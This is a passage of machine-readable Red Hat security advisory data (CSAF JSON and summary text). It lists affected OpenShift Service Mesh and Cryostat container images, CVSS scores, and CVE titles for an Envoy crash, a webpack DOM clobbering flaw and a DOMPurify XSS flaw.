"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Envoy crashes for `LocalReply` in HTTP async client", }, ], }
RHSA-2024:7706
Vulnerability from csaf_redhat
Published
2024-10-07 01:12
Modified
2025-04-09 21:05
Summary
Red Hat Security Advisory: Red Hat build of Cryostat security update
Notes
Topic
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Security Fix(es):
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nSecurity Fix(es):\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7706", url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7706.json", }, ], title: "Red Hat Security Advisory: Red Hat build of Cryostat security update", tracking: { current_release_date: "2025-04-09T21:05:42+00:00", generator: { date: "2025-04-09T21:05:42+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:7706", initial_release_date: "2024-10-07T01:12:29+00:00", revision_history: [ { date: "2024-10-07T01:12:29+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T01:12:29+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-09T21:05:42+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Cryostat 3 on RHEL 8", product: { name: "Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3", product_identification_helper: { cpe: "cpe:/a:redhat:cryostat:3::el8", }, }, }, ], category: "product_family", name: "Cryostat", }, { branches: [ { category: "product_version", name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product_id: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product_id: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product_id: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product_id: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product_id: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product_id: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product: { name: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product_id: "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product: { name: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product_id: "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product: { name: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product_id: "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", product_identification_helper: { purl: "pkg:oci/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8&tag=3.0.1-3", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product_id: "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product_id: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product_id: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product_id: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", product_identification_helper: { purl: "pkg:oci/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4?arch=amd64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: 